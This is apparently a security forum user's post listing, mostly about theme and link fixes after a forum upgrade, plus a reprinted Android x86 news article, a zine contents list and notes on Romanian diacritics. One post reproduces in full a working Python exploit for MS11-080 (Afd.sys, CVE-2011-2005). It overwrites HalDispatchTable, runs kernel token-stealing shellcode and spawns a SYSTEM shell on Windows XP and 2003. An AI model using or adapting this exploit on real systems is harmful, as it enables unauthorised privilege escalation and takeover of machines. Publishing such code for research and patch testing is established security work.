Posts: 18715
Days Won: 701

Everything posted by Nytro
-
We don't have time to modify the other themes as well; RST Beta is the only one we're working on.
-
If you click "Go advanced", you can select a title for the post. That title appears there, like here. I can see the theme has a lot of problems; I've fixed many of them, but there are probably still many left. For example, the "Online list" text for Guests or Bots was the same colour as the background, and so on. If you find such problems, post them here.
-
Here: http://rstcenter.com/forum/usercp.php PS: I'm "working" on the Likes part; it may temporarily look very ugly, I hope I'll come up with something nice, though the chances are slim. Edit: I've made changes to the graphics of the Likes (the button above the topic). It's fine as long as there are no more than 99 likes. If there are problems with it, let me know. The part below the post, with "Edit post", "Reply", I'm leaving as it is for now. I made it darker and the icons on the left are no longer visible. Anyway, I like it this way, but say if you want me to change it.
-
They look interesting, I'll send you a PM.
-
Google's Android 4.0 ported to x86 processors

Following ARM, an open-source project has ported Google's Android 4.0 to work on a tablet with an AMD chip

Agam Shah (IDG News Service), 02 December, 2011 06:50

Google's open-source Android 4.0 operating system for smartphones and tablets has been ported to work with x86 processors, a member of an open-source project involved in the effort said this week.

The source code of Android 4.0.1, which is code-named Ice Cream Sandwich, is for developers and designed to work with tablets based on Advanced Micro Devices' low-power x86 chips code-named Brazos, which are typically used in netbooks and low-end laptops. Some AMD chips are being used in tablets such as MSI's WindPad 110W.

The port means that tablets with Android 4.0 based on x86 chips could be on the horizon. Intel is the top x86 chipmaker, and the company has already said it is working with Google to bring Android 4.0 to smartphones and tablets.

The announcement was made on a discussion forum by Chih-Wei Huang, who belongs to Android-x86.org, a group of volunteer developers focusing on Android for x86.

Google released the source code for Android 4.0 earlier this month. However, most of the Android OS development has been centered around ARM processors, which are used in most smartphones and tablets today. The Samsung Galaxy Nexus smartphone with Android 4.0 has already been released, and ARM-based device makers are promising upgrades on tablets and smartphones to Android 4.0 from Android 3.x, which is code-named Honeycomb.

The port of Android 4.0.1 to x86 is still a work in progress. The source code, which is available for download on Android-x86.org, provides Wi-Fi, multitouch and hardware graphics acceleration capabilities. It does not provide sound, camera, Ethernet networking or hardware acceleration for Intel-based processors yet.

MIPS, a competitive processor architecture to x86 and ARM, will also get Android 4.0 soon. A spokeswoman for MIPS Technologies, which licenses the architecture, earlier this month said the company was waiting for Google to open source the software so its engineers could port the OS.

Source: http://www.techworld.com.au/article/409081/google_android_4_0_ported_x86_processors
-
We'll keep tweaking the theme colours and fix the small problems that come up. @Anonimul: Yes, I modified a lot of things, but everything is fine; it's just that vbSEO probably builds a cache, which is why it takes a few minutes for certain links to become active, i.e. it worked afterwards without me doing anything.
-
GNY Zine, Issue #6

Go Null Yourself E-Zine
Issue #6 - Fall/November 2011
www.GoNullYourself.org

0x01 Introduction
0x02 Editorials
0x03 Floating Point Numbers Suck - dan
0x04 duper's Code Corner - duper
0x05 How Skynet Works: An Intro to Neural Networks - elchupathingy
0x06 Defeating NX/DEP With return-to-libc and ROP - storm
0x07 A New Kind of Google Mining - Shadytel, Inc
0x08 Stupid Shell Tricks - teh crew
0x09 An Introduction to Number Theory - dan
0x0a Information Security Careers Cheatsheet - Dan Guido
0x0b Interview with Dan Rosenberg (bliss) - teh crew
0x0c Et Cetera, Etc. - teh crew

Download: http://www.exploit-db.com/papers/18168/
-
A stupid problem with pagination, let me see what's wrong with it... It seems there are temporary problems with the URL rewriting, but in a few minutes everything is OK.
-
MS11-080 Afd.sys Privilege Escalation Exploit

################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: ryujin@offsec.com - Matteo Memelli                    ########
######### Spaghetti & Pwnsauce                                          ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com                        ########
#########                                                               ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin            ########
######### for helping out!                                              ########
#########                                                               ########
######### To my Master Shifu muts:                                      ########
######### "So that's it, I just need inner peace?"                      ########
#########                                                               ########
######### Exploit tested on the following 32bits systems:               ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng             ########
################################################################################

from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
                    c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
                    c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser

usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
                  action="store", dest="target_os",
                  help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
    parser.print_help()
    sys.exit()
OS = OS.upper()

kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi

def findSysBase(drvname=None):
    ARRAY_SIZE = 1024
    myarray = c_ulong * ARRAY_SIZE
    lpImageBase = myarray()
    cb = c_int(1024)
    lpcbNeeded = c_long()
    drivername_size = c_long()
    drivername_size.value = 48
    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
    for baseaddy in lpImageBase:
        drivername = c_char_p("\x00"*drivername_size.value)
        if baseaddy:
            Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
                                           drivername_size.value)
            if drvname:
                if drivername.value.lower() == drvname:
                    print "[+] Retrieving %s info..." % drvname
                    print "[+] %s base address: %s" % (drvname, hex(baseaddy))
                    return baseaddy
            else:
                if drivername.value.lower().find("krnl") !=-1:
                    print "[+] Retrieving Kernel info..."
                    print "[+] Kernel version:", drivername.value
                    print "[+] Kernel base address: %s" % hex(baseaddy)
                    return (baseaddy, drivername.value)
    return None

print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - ryujin@offsec.com"
print "[>] Release Date 28/11/2011"

WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int

class sockaddr_in(Structure):
    _fields_ = [
        ("sin_family", c_short),
        ("sin_port", c_ushort),
        ("sin_addr", c_ulong),
        ("sin_zero", c_char * 8),
    ]

## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
                   None, 0, 0)
if client == ~0:
    raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
    addr = sockaddr_in()
    addr.sin_family = socket.AF_INET
    addr.sin_port = socket.htons(4455)
    addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
    ## We need to connect to a closed port, socket state must be CONNECTING
    connect(client, byref(addr), sizeof(addr))
except:
    closesocket(client)
    raise

baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
            "\x00\x00\x00\x00\x44\x44\x44\x44"
            "\x01\x00\x00\x00"
            "\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0,
                                         byref(RegionSize), MEMRES, PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))

################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
    HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
    HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
    HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
    HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)

################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
    _KPROCESS = "\x44"
    _TOKEN = "\xc8"
    _UPID = "\x84"
    _APLINKS = "\x88"
else:
    _KPROCESS = "\x38"
    _TOKEN = "\xd8"
    _UPID = "\x94"
    _APLINKS = "\x98"

restore_ptrs = "\x31\xc0" + \
    "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
    "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
    "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
    "\xa3" + struct.pack("L", HalDispatchTable0x4)

tokenstealing = "\x52" +\
    "\x53" +\
    "\x33\xc0" +\
    "\x64\x8b\x80\x24\x01\x00\x00" +\
    "\x8b\x40" + _KPROCESS +\
    "\x8b\xc8" +\
    "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
    "\x89\x1d\x00\x09\x02\x00" +\
    "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
    "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
    "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
    "\x75\xe8" +\
    "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
    "\x8b\xc1" +\
    "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
    "\x5b" +\
    "\x5a" +\
    "\xc2\x10"

restore_token = "\x52" +\
    "\x33\xc0" +\
    "\x64\x8b\x80\x24\x01\x00\x00" +\
    "\x8b\x40" + _KPROCESS +\
    "\x8b\x15\x00\x09\x02\x00" +\
    "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
    "\x5a" +\
    "\xc2\x10"

shellcode = padding + restore_ptrs + tokenstealing
shellcode_size = len(shellcode)
orig_size = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                            shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                            shellcode_size, byref(written))

## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL = 0x000120bb # AFDJoinLeaf
inputbuffer = 0x1004
inputbuffer_size = 0x108
outputbuffer_size = 0x0 # Bypass Probe for Write
outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client, None, None, None,
                                       byref(IoStatusBlock), IOCTL,
                                       inputbuffer, inputbuffer_size,
                                       outputbuffer, outputbuffer_size)
## Trigger shellcode
inp = c_ulong()
out = c_ulong()
inp = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")

############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode = padding + restore_ptrs + restore_token
shellcode_size = len(shellcode)
trail_padding = (orig_size - shellcode_size) * "\x00"
shellcode += trail_padding
shellcode_size += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                            shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                            shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client, None, None, None,
                                       byref(IoStatusBlock), IOCTL,
                                       inputbuffer, inputbuffer_size,
                                       outputbuffer, outputbuffer_size)
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"

Source: http://www.exploit-db.com/exploits/18176/
-
Update: I've brought the links back to their original form, e.g. "44039-rst-upgrade-2.rst". Problems may appear; I've checked it broadly and it seems fine, but if something is not right, if invalid links show up, please let me know. PS: Some links were of the form "44039-rst-upgrade-2-post-1337.html"; they now appear with ".rst", and you'll be redirected from such an "html" link. I hope no problems come up.
-
We'll take care of the homepage too, as time allows.
-
I hope we'll sort out the theme in a few days. Does anyone else have this problem with the 10 characters when writing a valid message, i.e. one that isn't just a "quote", for example?
-
If you had searched a bit you would have found this: http://en.wikipedia.org/wiki/Features_new_to_Windows_7 If you want to go into detail: http://channel9.msdn.com/Shows/Going+Deep/Mark-Russinovich-Inside-Windows-7 A few technical details: http://www.slideshare.net/msigeek/windows-7-ver-4
-
Thanks for the feedback. Yes, the main problems are:
- a new, "unique" theme, like the old one; apart from that there's nothing we can do, you're all different, you have different tastes, we can't please everyone, but I think we'll keep those themes, maybe tweak them a bit, and it should be fine for everybody
- rewriting the links and bringing them back to the old form
That's about what we have to do for the moment; let's hope we'll solve the link problem today.
-
RST Upgrade

I made some changes this evening: I updated the forum and made a few more minor changes. The main problem that needed fixing was the special characters issue, the diacritics, which should now be solved. Quite a few problems may show up, some I'm aware of, some not yet. If you find a problem, please post it here or send me a PM. The themes have only been installed; we haven't had time to modify them, but they are problematic, both in terms of colours and because some images are missing. My advice is to use the Default theme for a few days, then we'll fix this problem too. We'll be working these days and there will be more changes, so we also welcome suggestions.
-
Ă ă: căciulă (breve); when the sign is placed above a letter representing a vowel to indicate a short pronunciation (for example a semivowel), it is called the short sign. Â â Î î: circumflex; in other languages the phonetic value of this diacritic is different. Ș ș Ț ț: virguliță (comma below) or virgulă, placed under the corresponding letters s, S, t, T. The cedilla variants are very widespread, especially in computer typesetting, but incorrect (see the articles Ş, Ţ). Ç ç Ş ş: cedilla; used for example in French, Albanian and Turkish. Its appearance differs from that of the comma below used in the Romanian letters Ș and Ț. Ñ ñ Ã ã: tilde; used for example in Spanish and Portuguese or in the International Phonetic Alphabet. Č č Š š: háček; used for example in Czech, Slovak, Serbian, Croatian etc. Ä ä Ö ö: trema or umlaut; used for example in Finnish, Swedish, German, French and Turkish. È è Ò ò: grave accent; used for example in French and Italian. É é Á á: acute accent; used for example in French and Hungarian. In Romanian it is sometimes used on headwords in dictionaries or to mark the stress in words that would otherwise be confused, for example: (doi) copíi is different from (două) cópii.
-
From 0x90 to 0x4c454554, a journey into exploitation
-
Be patient for a day or two... We'll sort it out.
-
I know, but I haven't had time; these days we're getting rid of all the problems. Copy the post, click Edit and then Save. It works this way, but not in all cases.
-
You either write too much, or too little.
-
Ugh, I don't even want to look at the code again, it's thrown together, I have stretches where I close 7-8 braces in one place... Yes, I was a beginner then. I'm not a fan of frameworks, I haven't worked on it since, I moved on to C/C++ and other things and haven't had time.
-
Let's be serious, think about it: how many of you have changed someone's status? Quite a few...